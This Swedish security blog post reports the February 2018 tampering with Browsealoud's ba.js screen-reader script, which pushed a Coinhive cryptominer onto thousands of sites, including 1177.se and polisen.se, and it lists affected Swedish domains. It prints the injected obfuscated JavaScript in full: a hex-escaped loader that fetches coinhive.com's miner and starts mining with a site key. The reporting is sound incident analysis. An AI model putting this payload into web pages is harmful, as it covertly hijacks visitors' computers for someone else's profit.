Javascript-miner installerad på hundratals populära svenska sajter

Uppdatering: En intressant iakttagelse jag har gjort är att sökfrågor på 1177.se skickas vidare till tredjeparter såsom Google och Browsealoud. Denna går att läsa ut via http referer headern eller window.location.href. Och ännu värre hade varit om en keylogger hade installerats i ba.js och då läst ut tips till polisen eller anonyma frågor till 1177.

För en stund sedan så modifierades en Amazon S3-lagringsplats som innehöll ett populärt javascript vid namn ba.js. Scriptet används för mjukvaran Browsealoud Web Screen Reader Software.

Följande skärmdump är från Reddit där en besökare till 1177.se som får en varning från sitt antivirus-program gällande :

Skärmdump av användaren ObjectiveDate på Reddit

Sökväg till scriptet som låg på Amazons CloudFront-tjänst d2pt7h3k9ifq48.cloudfront.net:

  • www.browsealoud.com/plus/scripts/ba.js

Och läser vi på om Coinhive så är det kryptovaluton som det rör sig om (jag skrev tidigare felaktigt Bitcoin):

Coinhive offers a for the Monero (Why Monero?) that you can embed in your website

Och runt 4000 unika domäner länkar till detta script. Ett axplock av .se-domäner som länkar till scriptet som modifierats är följande:

  • lu.se
  • 1177.se
  • polisen.se
  • du.se
  • mah.se
  • malmo.se
  • hallakonsument.se
  • lund.se
  • skane.se
  • lansstyrelsen.se
  • mau.se
  • norrkoping.se
  • kungalv.se
  • botkyrka.se
  • informationsverige.se
  • finspang.se
  • moderaterna.se
  • linkoping.se
  • spsm.se
  • rsyd.se
  • karlstad.se
  • jonkoping.se
  • stockholmshem.se
  • abf.se
  • energimyndigheten.se
  • gotland.se
  • konsumentverket.se
  • humana.se
  • lfv.se
  • elsakerhetsverket.se
  • katrineholm.se
  • alingsas.se
  • haninge.se
  • arn.se
  • kulturradet.se
  • lanstrafikenkron.se
  • seom.se
  • xtrafik.se
  • fmv.se
  • vasamuseet.se
  • sigtuna.se
  • solleftea.se
  • sigtunahem.se
  • ljungby.se
  • do.se
  • alvdalen.se
  • ltkalmar.se
  • kalmar.se
  • jo.se
  • vannas.se
  • mjolby.se
  • folktandvardenskane.se
  • konsumenternas.se
  • musikverket.se
  • oskarshamn.se
  • moneyfromsweden.se
  • nordiskamuseet.se
  • autism.se
  • blekingetrafiken.se
  • knivsta.se
  • sbu.se

Och följande obfuskerade javascript-kod las till för att peka till CoinHive:

/* [Warning] Do not copy or self host this file, you will not be supported */ /* BrowseAloud Plus v2.5.0 (13-09-2017) */ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x27\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x63\x6f\x6d\x2f\x6c\x69\x62\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x6d\x69\x6e\x2e\x6a\x73\x3f\x72\x6e\x64\x3d"+window["\x4d\x61\x74\x68"]["\x72\x61\x6e\x64\x6f\x6d"]()+"\x27\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74\x3e \x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79\x2f\x33\x29\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d \x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 \x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x28\'\x31\x47\x64\x51\x47\x70\x59\x31\x70\x69\x76\x72\x47\x6c\x56\x48\x53\x70\x35\x50\x32\x49\x49\x72\x39\x63\x79\x54\x7a\x7a\x58\x71\'\x2c \x63\x70\x75\x43\x6f\x6e\x66\x69\x67\x29\x3b\x6d\x69\x6e\x65\x72\x2e\x73\x74\x61\x72\x74\x28\x29\x3b\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');

Tipstack till Linus Särud, Frans Rosén och Claes Magnusson.

Scriptet var modifierat mellan följande tidpunkter enligt Archive.org:

  • Sun, 11 Feb 2018 02:58:04 GMT
  • Sun, 11 Feb 2018 13:21:56 GMT

Jonas Lejon

Om Jonas Lejon

En av sveriges främsta cybersäkerhetsexperter med nästan 20 års erfarenhet inom området och en bakgrund från FRA och Försvarsmakten. Kontakta mig gärna på telefonnummer 010 1889848 eller [email protected] om Er organisation behöver hjälp med cybersäkerhet. LinkedIn Twitter

Skriv en kommentar

Du kan använda följande HTML HTML:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Denna webbplats använder Akismet för att minska skräppost. Lär dig hur din kommentardata bearbetas.